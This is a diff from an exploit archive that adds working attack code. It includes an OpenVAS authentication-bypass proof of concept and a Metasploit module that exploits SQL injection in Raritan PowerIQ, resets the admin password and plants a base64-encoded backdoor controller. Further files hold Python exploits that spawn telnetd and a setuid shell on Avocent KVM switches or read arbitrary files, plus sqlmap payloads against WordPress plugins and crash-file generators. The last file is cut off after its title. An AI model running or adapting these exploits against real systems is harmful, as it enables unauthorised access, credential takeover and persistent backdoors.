designed in OMP protocol, commands must be sent this way : + +""" + +import socket, ssl + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +# Require a certificate from the server. We used a self-signed certificate +# so here cacerts.pem must be the server certificate itself. +ssl_sock = ssl.wrap_socket(s, + ca_certs="/var/lib/openvas/CA/cacert.pem", + cert_reqs=ssl.CERT_REQUIRED) + +# OpenVAS Manager listen by default on localhost tcp/9390 +ssl_sock.connect(('localhost', 9390)) + + +print "#################################################################" +print "# Proof of Concept - OpenVAS Manager 4.0 Authentication Bypass #" +print "#################################################################" +print "\n" + +print "--> Retrieving version...(exploiting the bug !)\n" +ssl_sock.write("") +data = ssl_sock.read() +print data +print "\n" + + +print "--> Retrieving slaves...\n" +ssl_sock.write("") +tasks = ssl_sock.read() +print tasks +print "\n" + +""" +print "--> Creating note...\n" +ssl_sock.write("") +note = ssl_sock.read() +print note + +print "--> Retrieving users list...\n" +ssl_sock.write("") +users_list = ssl_sock.read() +print users_list +""" +ssl_sock.close() diff --git a/platforms/linux/webapps/34130.rb b/platforms/linux/webapps/34130.rb new file mode 100755 index 000000000..507a05070 --- /dev/null +++ b/platforms/linux/webapps/34130.rb @@ -0,0 +1,572 @@ +=begin +Raritan PowerIQ suffers from an unauthenticated SQL injection vulnerability +within an endpoint used during initial configuration of the licensing for +the product. This endpoint is still available after the appliance has been +fully configured. + +POST /license/records HTTP/1.1 + +Host: 192.168.1.11 + +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) +Gecko/20100101 Firefox/26.0 + +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +X-Requested-With: XMLHttpRequest + +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +Referer: https://192.168.1.11/license + +Content-Length: 15 + +Connection: keep-alive + +Pragma: no-cache + +Cache-Control: no-cache + + +sort=id&dir=ASC + + + +Both the 'sort' and 'dir' parameters are vulnerable. + +sqlmap identified the following injection points with a total of 1173 +HTTP(s) requests: +--- +Place: POST +Parameter: sort + Type: boolean-based blind + Title: Generic boolean-based blind - GROUP BY and ORDER BY clauses + Payload: sort=id,(SELECT (CASE WHEN (6357=6357) THEN 1 ELSE 1/(SELECT +0) END))&dir=ASC + + Type: stacked queries + Title: PostgreSQL > 8.1 stacked queries + Payload: sort=id; SELECT PG_SLEEP(5)--&dir=ASC + + Type: AND/OR time-based blind + Title: PostgreSQL > 8.1 time-based blind - Parameter replace + Payload: sort=(SELECT 5480 FROM PG_SLEEP(5))&dir=ASC + +Place: POST +Parameter: dir + Type: boolean-based blind + Title: Generic boolean-based blind - GROUP BY and ORDER BY clauses + Payload: sort=id&dir=ASC,(SELECT (CASE WHEN (5274=5274) THEN 1 ELSE +1/(SELECT 0) END)) + + Type: stacked queries + Title: PostgreSQL > 8.1 stacked queries + Payload: sort=id&dir=ASC; SELECT PG_SLEEP(5)-- + + Type: AND/OR time-based blind + Title: PostgreSQL > 8.1 time-based blind - GROUP BY and ORDER BY clauses + Payload: sort=id&dir=ASC,(SELECT (CASE WHEN (1501=1501) THEN (SELECT +1501 FROM PG_SLEEP(5)) ELSE 1/(SELECT 0) END)) +--- + + +There may also be a remote command execution vulnerability available to +administrators (or you if you use the stacked injection to update the +hashes). + +When saving an NTP server, you can inject a newline (%0a) into the request +in order to save a malformed 'server' stanza in the ntp.conf. When syncing +with NTP, the application passes the first NTP server to the NTP utility +via bash. I was not able to make my malformed NTP server available as the +first in the list, thus was not able to achieve RCE. There may be a way to +do it though that I am unaware of. + +Attached is a Metasploit module that I began writing when attempting to +achieve RCE but was never able to. This module will + +A) Pull out the current password hash and salt for the 'admin' user and +cache them. +B) Update the admin creeds to be 'admin:Passw0rd!' +C) Set up the malformed NTP server +D) Attempt to sync with NTP. + +Because I was not able to achieve RCE via that vector, this module does not +actually pop a shell, so I am sorry about that. + +Maybe some PostgreSQL UDF fanciness will be the key. + +You may also find the module available here: +https://gist.github.com/brandonprry/01bcd9ec7b8a78ccfc42 + +Quick module run: + +bperry@w00den-pickle:~/tools/msf_dev$ ./msfconsole + _ _ +/ \ /\ __ _ __ /_/ __ +| |\ / | _____ \ \ ___ _____ | | / \ _ \ \ +| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| +|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ + |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ + + + =[ metasploit v4.9.0-dev [core:4.9 api:1.0] ] ++ -- --=[ 1292 exploits - 702 auxiliary - 202 post ] ++ -- --=[ 332 payloads - 33 encoders - 8 nops ] + +msf > use exploit/linux/http/raritan_poweriq_sqli +msf exploit(raritan_poweriq_sqli) > set RHOST 192.168.1.25 +RHOST => 192.168.1.25 +msf exploit(raritan_poweriq_sqli) > check + +[*] Attempting to get banner... This could take several minutes to +fingerprint depending on network speed. +[*] Looks like the length of the banner is: 107 +[+] Looks like you are vulnerable. +[+] 192.168.1.25:443 - The target is vulnerable. +msf exploit(raritan_poweriq_sqli) > exploit + +[*] Started reverse handler on 192.168.1.31:4444 +[*] Checking if vulnerable before attempting exploit. +[*] Attempting to get banner... This could take several minutes to +fingerprint depending on network speed. +[*] Looks like the length of the banner is: 107 +[+] Looks like you are vulnerable. +[*] We are vulnerable. Exploiting. +[*] Caching current admin user's password hash and salt. +[*] I can set it back later and they will be none the wiser +[*] Grabbing current hash +[*] Old hash: 84c420e40496930e27301b10930e5966638e0b21 +[*] Grabbing current salt +[*] Old salt: 8f3cceddf302b3e2465d6e856e8818c6217d4d04 +[*] Resetting admin user credentials to admin:Passw0rd! +[*] Authenticating with admin:Passw0rd! +[*] Setting some stuff up +[*] Sending stager +[*] Triggering stager +[*] Exploit completed, but no session was created. +msf exploit(raritan_poweriq_sqli) > + + +-- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website +=end + +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Raritan PowerIQ Unauthenticated SQL Injection", + 'Description' => %q{ + This module will exploit an unauthenticated SQL injection in order to gain + a shell on the remote victim. This was tested against PowerIQ v4.1.0. + + The 'check' command will attempt to pull the banner of the DBMS (PGSQL) in + order to verify exploitability via boolean injections. + + In order to gain remote command execution, multiple vulnerabilities are used. + + I use a SQL injection to gain administrative access. + + I use a newline injection to save an NTP server I shouldn't be able to save. + + By saving this unsanitized NTP server, I can execute commands as 'nginx' with + a request to the server's web application. + + You can find a trial ISO at the following link. CentOS-based with PGSQL. + This is what this module was tested against. + + http://cdn.raritan.com/download/power-iq/v4.1.0/power-iq-v4.1.0.73.iso + + Trial license: + http://d3b2us605ptvk2.cloudfront.net/download/power-iq/RAR_PWIQ5FL_W7rYAAT_13JAN10_1206.lic + + If for some reason these links do not work, I "registered" for the trial here: + https://www1.raritan.com/poweriqdownload.html + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + ], + 'References' => + [ + ], + 'DefaultOptions' => + { + 'SSL' => true, + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'BadChars' => "\x20", + 'Compat' => + { + 'RequiredCmd' => 'generic perl python', + } + }, + 'Targets' => + [ + ['Raritan PowerIQ v4.1.0', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => "", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(443), + OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) + ], self.class) + end + + #In order to check for exploitability, I will enumerate the banner + #of the DBMS until I have it match a regular expression of /postgresql/i + # + #This isn't optimal (takes a few minutes), but it is reliable. I use + #a boolean injection to enumerate the banner a byte at a time. + def check + + #First we make a request that we know should return a 200 + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'license', 'records'), + 'method' => 'POST', + 'headers' => { + 'X-Requested-With' => 'XMLHttpRequest' + }, + 'data' => 'sort=id&dir=ASC' + }) + + if !res or res.code != 200 + return Exploit::CheckCode::Safe + end + + #Now we make a request that we know should return a 500 + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'license', 'records'), + 'method' => 'POST', + 'headers' => { + 'X-Requested-With' => 'XMLHttpRequest' + }, + 'data' => "sort=id'&dir=ASC" + }) + + if !res or res.code != 500 + print_error("Probably not vulnerable.") + return Exploit::CheckCode::Safe + end + + #If we have made it this far, we believe we are exploitable, + #but now we must prove it. Get the length of the banner before + #attempting to enumerate the banner. I assume the length + #is not greater than 999 characters. + print_status("Attempting to get banner... This could take several minutes to fingerprint depending on network speed.") + + length = '' + (1..3).each do |l| + (47..57).each do |i| + str = "sort=id,(SELECT (CASE WHEN (ASCII(SUBSTRING((COALESCE(CAST(LENGTH(VERSION()) AS CHARACTER(10000)),(CHR(32))))::text FROM #{l} FOR 1))>#{i}) THEN 1 ELSE 1/(SELECT 0) END))&dir=ASC" + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'license', 'records'), + 'method' => 'POST', + 'headers' => { + 'X-Requested-With' => 'XMLHttpRequest' + }, + 'data' => str + }) + + if res and res.code == 500 + length << i.chr + break + end + end + end + + if length == '' + return Exploit::CheckCode::Safe + end + + print_status("Looks like the length of the banner is: " + length) + + #We have the length, now let's get the banner until it matches + #the regular expression /postgresql/i + banner = '' + (1..length.to_i).each do |c| + (32..126).each do |b| + str = "sort=id,(SELECT (CASE WHEN (ASCII(SUBSTRING((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32))))::text FROM #{c} FOR 1))>#{b}) THEN 1 ELSE 1/(SELECT 0) END))&dir=ASC" + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'license', 'records'), + 'method' => 'POST', + 'headers' => { + 'X-Requested-With' => 'XMLHttpRequest', + }, + 'data' => str + }) + + if res and res.code == 500 + banner << b.chr + + if c%10 == 0 + vprint_status("#{((c.to_f/length.to_f)*100).to_s}% done: " + banner) + end + + if banner =~ /postgresql/i + print_good("Looks like you are vulnerable.") + vprint_good("Current banner: " + banner) + return Exploit::CheckCode::Vulnerable + end + + break + end + end + end + + #If we reach here, we never matched our regex, which means we must + #not be vulnerable. + return Exploit::CheckCode::Safe + end + + def exploit + + print_status("Checking if vulnerable before attempting exploit.") + + if check == Exploit::CheckCode::Vulnerable + print_status("We are vulnerable. Exploiting.") + print_status("Caching current admin user's password hash and salt.") + print_status("I can set it back later and they will be none the wiser") + + print_status("Grabbing current hash") + old_crypted_password = get_admin_column_value("crypted_password") + print_status("Old hash: " + old_crypted_password) + + print_status("Grabbing current salt") + old_salt = get_admin_column_value("salt") + print_status("Old salt: " + old_salt) + + print_status("Resetting admin user credentials to admin:Passw0rd!") + + headers = { + 'X-Requested-With' => 'XMLHttpRequest' + } + + salt_inj = ';UPDATE users set salt = (CHR(56)||CHR(102)||CHR(51)||CHR(99)||CHR(99)||CHR(101)||CHR(100)||CHR(100)||CHR(102)||CHR(51)||CHR(48)||CHR(50)||CHR(98)||CHR(51)||CHR(101)||CHR(50)||CHR(52)||CHR(54)||CHR(53)||CHR(100)||CHR(54)||CHR(101)||CHR(56)||CHR(53)||CHR(54)||CHR(101)||CHR(56)||CHR(56)||CHR(49)||CHR(56)||CHR(99)||CHR(54)||CHR(50)||CHR(49)||CHR(55)||CHR(100)||CHR(52)||CHR(100)||CHR(48)||CHR(52)) WHERE login = (CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110))--' + hash_inj = ';UPDATE users set crypted_password=(CHR(56)||CHR(52)||CHR(99)||CHR(52)||CHR(50)||CHR(48)||CHR(101)||CHR(52)||CHR(48)||CHR(52)||CHR(57)||CHR(54)||CHR(57)||CHR(51)||CHR(48)||CHR(101)||CHR(50)||CHR(55)||CHR(51)||CHR(48)||CHR(49)||CHR(98)||CHR(49)||CHR(48)||CHR(57)||CHR(51)||CHR(48)||CHR(101)||CHR(53)||CHR(57)||CHR(54)||CHR(54)||CHR(54)||CHR(51)||CHR(56)||CHR(101)||CHR(48)||CHR(98)||CHR(50)||CHR(49)) WHERE login = (CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110))--' + + post = { + 'sort' => 'id' + salt_inj, + 'dir' => 'ASC' + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'license', 'records'), + 'method' => 'POST', + 'headers' => headers, + 'vars_post' => post + }) + + if !res or res.code != 200 + fail_with("Server did not respond in an expected way") + end + + post['sort'] = 'id' + hash_inj + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'license', 'records'), + 'method' => 'POST', + 'headers' => headers, + 'vars_post' => post + }) + + if !res or res.code != 200 + fail_with("Server did not respond in an expected way") + end + + print_status("Authenticating with admin:Passw0rd!") + post = { + 'login' => 'admin', + 'password' => 'Passw0rd!' + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'login', 'login'), + 'method' => 'POST', + 'vars_post' => post + }) + + if !res or res.code != 302 + fail_with("Authentication failed.") + end + + cookie = res.get_cookies + + print_status("Setting some stuff up") + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers.json'), + 'headers' => headers, + 'cookie' => cookie + }) + + if !res or res.code != 200 + fail_with("Server did not respond in an expected way.") + end + + servers = JSON.parse(res.body) + + post = { + '_method' => '_delete', + 'hosts' => servers["servers"].to_json + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers', 'destroy_batch'), + 'method' => 'DELETE', + 'vars_post' => post, + 'headers' => headers, + 'cookie' => cookie + }) + + if !res or res.code != 200 + fail_with("Server did not respond in an expected way.") + end + + print_status("Sending stager") + + stage = '`echo${IFS}Ye2xhc3MgRmRzYUNvbnRyb2xsZXIgPCBBY3Rpb25Db250cm9sbGVyOjpCYXNlCiAgZGVmIGluZGV4' + stage << 'CiAgICByZXQgPSBgI3twYXJhbXNbOmNtZF19YAogICAgcmVkaXJlY3RfdG8gcmV0CiAgZW5kCmVu' + stage << 'ZCAKIAoK|base64${IFS}--decode>/opt/raritan/polaris/rails/main/app/controllers/rewq_controller.rb`' + + post = { + 'host[server]' => "www.abc.com\x0aserver " + stage, + 'host[ip_type]' => '0' + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers'), + 'method' => 'POST', + 'vars_post' => post, + 'headers' => headers, + 'cookie' => cookie + }) + + if !res or res.code != 200 or res.body =~ /false/ + fail_with("Server did not respond in an expected way.") + end + + post = { + '_method' => '_delete', + 'hosts' => '[{"server":"www.abc.com", "ip_type":0}]' + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers', 'destroy_batch'), + 'method' => 'DELETE', + 'vars_post' => post, + 'headers' => headers, + 'cookie' => cookie + }) + + if !res or res.code != 200 + fail_with("Server did not respond in an expected way.") + end + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'admin', 'application_settings', 'edit'), + 'cookie' => cookie + }) + + if !res or res.code != 200 + fail_with("Server did not respond in an expected way.") + end + + res.body =~ /boxLabel: "Enable NTP",\n checked: (true|false),\n listeners/m + + checked = $1 + + if checked == "true" + post = { + '_method' => 'put', + 'rails_options[time_zone]' => 'UTC', + 'date_time' => '', + 'rails_options[ntp_enabled]' => 'off' + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'admin', 'time_setting'), + 'vars_post' => post, + 'method' => 'POST', + 'cookie' => cookie + }) + + if !res or res.code != 302 + fail_with("Server did not respond in an expected way") + end + end + + post = { + '_method' => 'put', + 'rails_options[time_zone]' => 'UTC', + 'date_time' => '', + 'rails_options[ntp_enabled]' => 'on' + } + + print_status("Triggering stager") + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'admin', 'time_setting'), + 'method' => 'POST', + 'vars_post' => post, + 'cookie' => cookie, + }) + + end + end + + def get_admin_column_value(column) + ret = '' + + (1..40).each do |i| + [*('0'..'9'),*('a'..'f')].each do |c| + inj = "(SELECT (CASE WHEN (ASCII(SUBSTRING((SELECT COALESCE(CAST(#{column} AS CHARACTER(10000)),(CHR(32))) FROM users WHERE login = (CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110)) OFFSET 0 LIMIT 1)::text FROM #{i} FOR 1))>#{c.ord}) THEN 1 ELSE 1/(SELECT 0) END))" + + post = { + 'sort' => 'id,' + inj, + 'dir' => 'ASC' + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'license', 'records'), + 'method' => 'POST', + 'headers' => { + 'X-Requested-With' => 'XMLHttpRequest' + }, + 'vars_post' => post + }) + + if !res + fail_with("Server did not respond in an expected way") + end + + if res.code == 500 + vprint_status("Got character '"+c+"' for index " + i.to_s) + ret << c + break + end + end + end + + return ret + end +end diff --git a/platforms/php/remote/34132.txt b/platforms/php/remote/34132.txt new file mode 100755 index 000000000..e2cc40cdd --- /dev/null +++ b/platforms/php/remote/34132.txt @@ -0,0 +1,128 @@ + *Product description* + The IBM 1754 GCM family provides KVM over IP and serial console management +technology in a single appliance. Versions v1.20.0.22575 and prior are +vulnerables. + Note that this vulnerability is also present in some DELL and probably +other vendors of this rebranded KVM. I contacted Dell but no response has +been received. + + *1. Remote code execution * + CVEID: CVE-2014-2085 + Description: Improperly sanitized input may allow a remote authenticated +attacker to perform remote code execution on the GCM KVM switch. + PoC of this vulnerability: + +#!/usr/bin/python""" +Exploit for Avocent KVM switch v1.20.0.22575. +Remote code execution with privilege elevation. +SessionId (avctSessionId) is neccesary for this to work, so you need a +valid user. Default user is "Admin" with blank password. +After running exploit, connect using telnet to device with user target +(pass: target) then do "/tmp/su -" to gain root (password "root") +alex.a.bravo@gmail.com +""" + +from StringIO import StringIO +import pycurl +import os + +sessid = "1111111111" +target = "192.168.0.10" + +durl = "https://" + target + "/systest.php?lpres=;%20/usr/ +sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod% +206755%20/tmp/su%20;" + +storage = StringIO() +c = pycurl.Curl() +c.setopt(c.URL, durl) +c.setopt(c.SSL_VERIFYPEER,0) +c.setopt(c.SSL_VERIFYHOST,0) +c.setopt(c.WRITEFUNCTION,storage.write) +c.setopt(c.COOKIE,'avctSessionId=' + sessid) + +try: + print "[*] Sending GET to " + target + " with session id " + sessid ++ "..." + c.perform() + c.close() +except: + print "" +finally: + print "[*] Done" +print "[*] Trying telnet..." +print "[*] Login as target/target, then do /tmp/su - and enter password +\"root\"" +os.system("telnet " + target) + +*2. Arbitrary file read * + CVEID: CVE-2014-3081 + Description: This device allows any authenticated user to read arbitrary +files. Files can be anywhere on the target. + + PoC of this vulnerability: + +#!/usr/bin/python +""" +This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to +read arbitrary files on device. +SessionId (avctSessionId) is neccesary for this to work, so you need a +valid user. +alex.a.bravo@gmail.com +""" + +from StringIO import StringIO +import pycurl + +sessid = "1111111111" +target = "192.168.0.10" +file = "/etc/IBM_user.dat" + +durl = "https://" + target + "/prodtest.php?engage=video_ +bits&display=results&filename=" + file + +storage = StringIO() +c = pycurl.Curl() +c.setopt(c.URL, durl) +c.setopt(c.SSL_VERIFYPEER,0) +c.setopt(c.SSL_VERIFYHOST,0) +c.setopt(c.WRITEFUNCTION,storage.write) +c.setopt(c.COOKIE,'avctSessionId=' + sessid) + +try: + c.perform() + c.close() +except: + print "" + +content = storage.getvalue() +print content.replace("","").replace("","") + +*3. Cross site scripting non-persistent* + CVEID: CVE-2014-3080 + Description: System is vulnerable to cross-site scripting, caused by +improper validation of user-supplied input. A remote attacker could exploit +this vulnerability using a specially-crafted URL to execute script in a +victim's Web browser within the security context of the hosting Web site, +once the URL is clicked. An attacker could use this vulnerability to steal +the victim's cookie-based authentication credentials. + + Examples: +http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E +https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E + +*Vendor Response:* +IBM release 1.20.20.23447 firmware + +*Timeline:* +2014-05-20 - Vendor (PSIRT) notified +2014-05-21 - Vendor assigns internal ID +2014-07-16 - Patch Disclosed +2014-07-17 - Vulnerability disclosed + +*External Information:* +Info about the vulnerability (spanish): +http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html +IBM Security Bulletin: +http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983 + diff --git a/platforms/php/webapps/34105.txt b/platforms/php/webapps/34105.txt new file mode 100755 index 000000000..15ed4df58 --- /dev/null +++ b/platforms/php/webapps/34105.txt @@ -0,0 +1,52 @@ +###################### +# Exploit Title : Wordpress Gallery Objects 0.4 SQL Injection + +# Exploit Author : Claudio Viviani + +# Vendor Homepage : http://galleryobjects.com/ + +# Software Link : http://downloads.wordpress.org/plugin/gallery-objects.0.4.zip + +# Dork Google: inurl:/admin-ajax.php?action=go_view_object + +# Date : 2014-07-18 + +# Tested on : Windows 7 / Mozilla Firefox + Windows 7 / sqlmap (0.8-1) + Linux / Mozilla Firefox + Linux / sqlmap 1.0-dev-5b2ded0 + + + +###################### + + +Poc via Browser: + +http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html + + +sqlmap: + +sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid + +--- +Place: GET +Parameter: viewid + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html +--- + + +##################### + +Discovered By : Claudio Viviani + http://www.homelab.it + info@homelab.it + + https://www.facebook.com/homelabit + https://twitter.com/homelabit + https://plus.google.com/+HomelabIt1/ + +##################### \ No newline at end of file diff --git a/platforms/php/webapps/34124.txt b/platforms/php/webapps/34124.txt new file mode 100755 index 000000000..f3fbb5c7e --- /dev/null +++ b/platforms/php/webapps/34124.txt @@ -0,0 +1,25 @@ +# Exploit Title: Wordpress wpbackupplus Database and files Backup download (0-day) +# Google Dork: Index of:"/wp-backup-plus" +# Date: 19/07/2014 +# Exploit Author: pSyCh0_3D (Arfaoui Moslem) https://www.facebook.com/lulz.sec +# Vendor Homepage: http://wpbackupplus.com/ +# Version: +# Tested on: win7 32 Bit & Linux Kali + +[+] Description + +wpbackupplus make the backup .zip files and not protected + +[+] Exploit: + +For download all the website files + +http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/ + +For download the Database backup + +http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/temp + +[+] POC : + +http://[SERVER]/wp-content/uploads/wp-backup-plus/temp/ diff --git a/platforms/win32/dos/34010.html b/platforms/win32/dos/34010.html new file mode 100755 index 000000000..d09c5c588 --- /dev/null +++ b/platforms/win32/dos/34010.html @@ -0,0 +1,113 @@ + + + + + + +
+ +
+ + + + + + + \ No newline at end of file diff --git a/platforms/windows/dos/34129.txt b/platforms/windows/dos/34129.txt new file mode 100755 index 000000000..9e6bfa3dc --- /dev/null +++ b/platforms/windows/dos/34129.txt @@ -0,0 +1,55 @@ +# Exploit Title: World Of Warcraft 3.3.5a Stack Overflow (macros-cache.txt) +# Date: 21 Jul 2014 +# Exploit Author: Alireza Chegini (@nimaarek) +# Vendor Homepage: http://us.battle.net/wow/ +# Version: 3.3.5a +# Tested on: Win7 + +Output: + +--WoWError [CrashDUmp] : +World of WarCraft (build 12340) + +Exe: D:\Wow\Wow.exe +Time: Jul 21, 2014 6:10:08.243 PM +User: nimaarek +Computer: NIMAAREK-L +------------------------------------------------------------------------------ + +This application has encountered a critical error: + +ERROR #132 (0x85100084) Fatal Exception +Program: D:\Wow\Wow.exe +Exception: 0xC00000FD (STACK_OVERFLOW) at 0023:0040BB77 + +--Windbg result: +0:020> g +ModLoad: 6c670000 6c6a0000 C:\Windows\SysWOW64\wdmaud.drv +ModLoad: 6d3a0000 6d3a4000 C:\Windows\SysWOW64\ksuser.dll +ModLoad: 6c660000 6c667000 C:\Windows\SysWOW64\AVRT.dll +ModLoad: 6c610000 6c618000 C:\Windows\SysWOW64\msacm32.drv +ModLoad: 6c600000 6c607000 C:\Windows\SysWOW64\midimap.dll +ModLoad: 71e50000 71e66000 C:\Windows\SysWOW64\CRYPTSP.dll +ModLoad: 71e10000 71e4b000 C:\Windows\SysWOW64\rsaenh.dll +(3a8.470): Stack overflow - code c00000fd (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for Wow.exe - +eax=02af2000 ebx=050c1f6e ecx=00000000 edx=00000000 esi=17b28f50 edi=00000000 +eip=0040bb77 esp=032eed00 ebp=032ef92c iopl=0 nv up ei pl nz na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 +Wow+0xbb77: +0040bb77 8500 test dword ptr [eax],eax ds:002b:02af2000=00000000 +============================================================================== +Poc : +%systemroot%\Wow\WTF\Account\[AccountName]\macros-cache.txt + +MACRO 1 "Decursive" INV_Misc_QuestionMark +/stopcasting +/cast [target=mouseover,nomod,exists] Dispel Magic; [target=mouseover,exists,mod:ctrl] Abolish Disease; [target=mouseover,exists,mod:shift] Dispel Magic +END +MACRO 2 "PoC" INV_Misc_QuestionMark +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA x n+1 :-) +END +============================================================================== +Greetz to My Friend : promoh3nv , AmirHosein Nemati , b3hz4d And Head Administrator of ST-Team [RadoN] \ No newline at end of file diff --git a/platforms/windows/dos/34135.py b/platforms/windows/dos/34135.py new file mode 100755 index 000000000..c366a5c43 --- /dev/null +++ b/platforms/windows/dos/34135.py @@ -0,0 +1,122 @@ +from shutil import copyfile +import sys + +""" +Exploit Title: DjVuLibre <= 3.5.25 Out of Bounds Access Violation +Date: 07/14/24 +Exploit Author: drone (@dronesec) +Vendor: http://djvu.sourceforge.net/ +Software link: http://downloads.sourceforge.net/djvu/djvulibre-3.5.25.3.tar.gz +Version: <= 3.5.25.3 +Tested On: WinXP/Win7 +Patch: https://sourceforge.net/p/djvu/djvulibre-git/ci/7993b445f071a15248bd4be788a10643213cb9d2/ + +The crash occurs due to a out of bounds read + + .text:004D3BC0 mov ecx, edx + .text:004D3BC2 and ecx, 0Fh + => .text:004D3BC5 mov eax, [eax+ecx*4] + .text:004D3BC8 test eax, eax + .text:004D3BCA jnz short loc_ + +We overwrite 4 bytes in an FG44 chunk header with \xff\xff\xff\xff: + + 46 47 + 34 34 00 00 04 6E 00 64 01 02 FF FF FF FF 80 FF <= + F2 D9 81 5E 5C 51 12 AD 6B 27 14 29 F6 53 2B DD + 79 B0 01 E3 E2 71 33 58 CA 23 AE 25 35 E8 FF FF + FF FF F5 BA 7A FA 45 39 C7 CD E0 76 93 FF FF FF + FF FF F4 F1 85 98 84 DF 58 71 FE 2A 5F FF B7 16 + 31 67 4E 93 F0 2D 20 D5 58 22 39 02 26 7E A6 03 + +The crash occurs during image parsing: + + // Allocate reconstruction buffer + short *data16; + GPBuffer gdata16(data16,bw*bh); + // Copy coefficients + int i; + short *p = data16; + const IW44Image::Block *block = blocks; + for (i=0; iwrite_liftblock(liftblock); + + [...] + + void + IW44Image::Block::write_liftblock(short *coeff, int bmin, int bmax) const + { + int n = bmin<<4; + memset(coeff, 0, 1024*sizeof(short)); + for (int n1=bmin; n1>4]) + return 0; + return pdata[n>>4][n&15]; + } + +Which lines up quite nicely with our inlined disassembly of the function: + + .text:004D3BB0 loc_4D3BB0: + .text:004D3BB0 mov ecx, [esp+0Ch+arg_0] + .text:004D3BB4 mov eax, edx + .text:004D3BB6 sar eax, 4 ; [n>>4] + .text:004D3BB9 mov eax, [ecx+eax*4] ; our pdata[n] data after the bitwise shift, lets call it n2 + .text:004D3BBC test eax, eax ; if(n2 == 0) + .text:004D3BBE jz short loc_4 ; return 0 + .text:004D3BC0 mov ecx, edx + .text:004D3BC2 and ecx, 0Fh ; apply n & 15, or pdata[n2][n&15], lets call it n3 +=> .text:004D3BC5 mov eax, [eax+ecx*4] ; dereference pdata[n2][n3] into d + .text:004D3BC8 test eax, eax ; test if d == 0 + .text:004D3BCA jnz short loc_ + +n2 refs to a location on the heap; may be exploitable if we stack Fg44 chunks with valid headers and malformed content, so the chunk +is allocated, then free'd, and hopefully our pointer dips into one of those free'd chunks. The returned short pointer is then used as the source in a +memcpy with a controllable destination; write-what-where. Who knows. + +Tested with SumatraPDF 2.5.2 and WinDjView 2.0.2 +""" + +if len(sys.argv) < 2: + print '[%s] ' % sys.argv[0] + sys.exit(1) + +bfile = sys.argv[1] + +# read in the data for parsing +base_data = None +with open(bfile, "rb") as f: + base_data = f.read() + +# find a valid chunk +chunk_idx = base_data.find("\x46\x47\x34\x34") +if chunk_idx == -1: + print '[-] No valid FG44 chunks found' + sys.exit(1) + +copyfile(bfile, "./%s-dos.djvu" % bfile) + +print '[!] Found FG44 chunk at offset %d' % chunk_idx + +# overwrite +with open("./%s-dos.djvu" % bfile, "r+b") as base: + # skip over 4 byte indicator (FG44) + # 2 byte primary header + # 2 byte secondary header + # 4 byte tertiary header + base.seek(chunk_idx+12) + base.write("\xff\xff\xff\xff") + +print '[!] %s-dos.djvu generated' % bfile \ No newline at end of file diff --git a/platforms/windows/local/34112.txt b/platforms/windows/local/34112.txt new file mode 100755 index 000000000..e738c0309 --- /dev/null +++ b/platforms/windows/local/34112.txt @@ -0,0 +1,206 @@ +Title: Microsoft XP SP3 